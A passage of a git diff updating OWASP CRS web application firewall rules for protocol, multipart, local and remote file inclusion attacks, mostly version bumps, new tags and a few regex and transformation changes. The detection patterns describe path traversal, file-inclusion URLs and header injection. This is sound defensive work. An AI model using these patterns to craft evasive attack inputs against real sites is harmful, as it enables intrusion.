+SecRule REQUEST_COOKIES:/\x22?\x24Version/ "@streq 1" \
+    "id:921250,\
+    phase:1,\
+    block,\
+    capture,\
+    t:none,t:lowercase,\
+    msg:'Old Cookies V1 usage attempt detected',\
+    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+    tag:'application-multi',\
+    tag:'language-multi',\
+    tag:'attack-protocol',\
+    tag:'paranoia-level/1',\
+    tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
+    tag:'capec/1000/210/272/220/33',\
+    ver:'OWASP_CRS/4.15.0-dev',\
+    severity:'CRITICAL',\
+    setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -323,7 +361,7 @@ SecRule ARGS_GET "@rx [\n\r]" \
     phase:1,\
     block,\
     capture,\
-    t:none,t:urlDecodeUni,t:htmlEntityDecode,\
+    t:none,\
     msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
     tag:'application-multi',\
@@ -332,8 +370,9 @@ SecRule ARGS_GET "@rx [\n\r]" \
     tag:'attack-protocol',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/210/272/220/33',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -367,15 +406,16 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?\b(?:((?:tex
     tag:'attack-protocol',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/255/153',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
@@ -404,8 +444,9 @@ SecRule &REQUEST_HEADERS:Range "@gt 0" \
     tag:'attack-protocol',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/210/272/220',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 
@@ -438,8 +479,9 @@ SecRule ARGS_NAMES "@rx ." \
     tag:'platform-multi',\
     tag:'attack-protocol',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/152/137/15/460',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'"
 
 SecRule TX:/paramcounter_.*/ "@gt 1" \
@@ -454,8 +496,9 @@ SecRule TX:/paramcounter_.*/ "@gt 1" \
     tag:'attack-protocol',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/152/137/15/460',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -496,16 +539,17 @@ SecRule ARGS_NAMES "@rx (][^\]]+$|][^\]]+\[)" \
     tag:'attack-protocol',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/152/137/15/460',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
@@ -544,8 +588,9 @@ SecRule ARGS_NAMES "@rx \[" \
     tag:'attack-protocol',\
     tag:'paranoia-level/4',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/PROTOCOL-ATTACK',\
     tag:'capec/1000/152/137/15/460',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-922-MULTIPART-ATTACK.conf b/rules/REQUEST-922-MULTIPART-ATTACK.conf
index 1a8f33cbe..281a3842e 100644
--- a/rules/REQUEST-922-MULTIPART-ATTACK.conf
+++ b/rules/REQUEST-922-MULTIPART-ATTACK.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -37,8 +37,9 @@ SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \
     tag:'attack-multipart-header',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/MULTIPART-ATTACK',\
     tag:'capec/1000/255/153',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.922100_charset=|%{ARGS._charset_}|',\
     chain"
@@ -65,11 +66,13 @@ SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*:\s*(.*)$" \
     tag:'application-multi',\
     tag:'language-multi',\
     tag:'platform-multi',\
+    tag:'attack-multipart-header',\
     tag:'attack-protocol',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/MULTIPART-ATTACK',\
     tag:'capec/272/220',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule TX:1 "!@rx ^(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\x0b]*;[\s\x0b]*(?:charset[\s\x0b]*=[\s\x0b]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\x0b-\"\(\),/:-\?\[-\]c\{\}]|c(?:[^!\"\(\),/:-\?\[-\]h\{\}]|h(?:[^!\"\(\),/:-\?\[-\]a\{\}]|a(?:[^!\"\(\),/:-\?\[-\]r\{\}]|r(?:[^!\"\(\),/:-\?\[-\]s\{\}]|s(?:[^!\"\(\),/:-\?\[-\]e\{\}]|e[^!\"\(\),/:-\?\[-\]t\{\}]))))))[^!\"\(\),/:-\?\[-\]\{\}]*[\s\x0b]*=[\s\x0b]*[^!\(\),/:-\?\[-\]\{\}]+);?)*(?:[\s\x0b]*,[\s\x0b]*(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\x0b]*;[\s\x0b]*(?:charset[\s\x0b]*=[\s\x0b]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\x0b-\"\(\),/:-\?\[-\]c\{\}]|c(?:[^!\"\(\),/:-\?\[-\]h\{\}]|h(?:[^!\"\(\),/:-\?\[-\]a\{\}]|a(?:[^!\"\(\),/:-\?\[-\]r\{\}]|r(?:[^!\"\(\),/:-\?\[-\]s\{\}]|s(?:[^!\"\(\),/:-\?\[-\]e\{\}]|e[^!\"\(\),/:-\?\[-\]t\{\}]))))))[^!\"\(\),/:-\?\[-\]\{\}]*[\s\x0b]*=[\s\x0b]*[^!\(\),/:-\?\[-\]\{\}]+);?)*)*$" \
@@ -88,11 +91,13 @@ SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \
     tag:'application-multi',\
     tag:'language-multi',\
     tag:'platform-multi',\
+    tag:'attack-multipart-header',\
     tag:'attack-deprecated-header',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/MULTIPART-ATTACK',\
     tag:'capec/272/220',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -114,7 +119,8 @@ SecRule MULTIPART_PART_HEADERS "@rx [^\x21-\x7E][\x21-\x39\x3B-\x7E]*:" \
     tag:'attack-multipart-header',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/MULTIPART-ATTACK',\
     tag:'capec/272/220',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
index 4cec13501..87d2ef445 100644
--- a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
+++ b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -14,8 +14,8 @@
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -46,8 +46,9 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:
     tag:'attack-lfi',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-LFI',\
     tag:'capec/1000/255/153/126',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"
@@ -64,7 +65,7 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:
 #
 # Semicolon added to prevent path traversal via reverse proxy mapping '/..;/' (Tomcat)
 #
-SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "@rx (?:(?:^|[\x5c/;])\.{2,3}[\x5c/;]|[\x5c/;]\.{2,3}(?:[\x5c/;]|$))" \
+SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "@rx (?:(?:^|[\x5c/;])\.{2,3}[\x5c/;]|[\x5c/;]\.{2,3}[\x5c/;])" \
     "id:930110,\
     phase:2,\
     block,\
@@ -78,8 +79,9 @@ SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "
     tag:'attack-lfi',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-LFI',\
     tag:'capec/1000/255/153/126',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
@@ -108,9 +110,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-lfi',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-LFI',\
     tag:'capec/1000/255/153/126',\
     tag:'PCI/6.5.4',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -135,17 +138,18 @@ SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \
     tag:'attack-lfi',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-LFI',\
     tag:'capec/1000/255/153/126',\
     tag:'PCI/6.5.4',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -173,24 +177,25 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@pmFromFile lfi-os-f
     tag:'attack-lfi',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-LFI',\
     tag:'capec/1000/255/153/126',\
     tag:'PCI/6.5.4',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
index e68fdf469..01a129cb3 100644
--- a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
+++ b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -17,8 +17,8 @@
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -48,8 +48,9 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?)://(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3
     tag:'attack-rfi',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RFI',\
     tag:'capec/1000/152/175/253',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -68,8 +69,9 @@ SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_abso
     tag:'attack-rfi',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RFI',\
     tag:'capec/1000/152/175/253',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -88,16 +90,17 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \
     tag:'attack-rfi',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RFI',\
     tag:'capec/1000/152/175/253',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -127,8 +130,9 @@ SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|it
     tag:'attack-rfi',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RFI',\
     tag:'capec/1000/152/175/253',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\
     chain"
@@ -157,8 +161,9 @@ SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b
     tag:'attack-rfi',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RFI',\
     tag:'capec/1000/152/175/253',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\
     chain"
@@ -167,16 +172,16 @@ SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b
         setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
index 8badbba70..0aafbf244 100644
--- a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
+++ b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
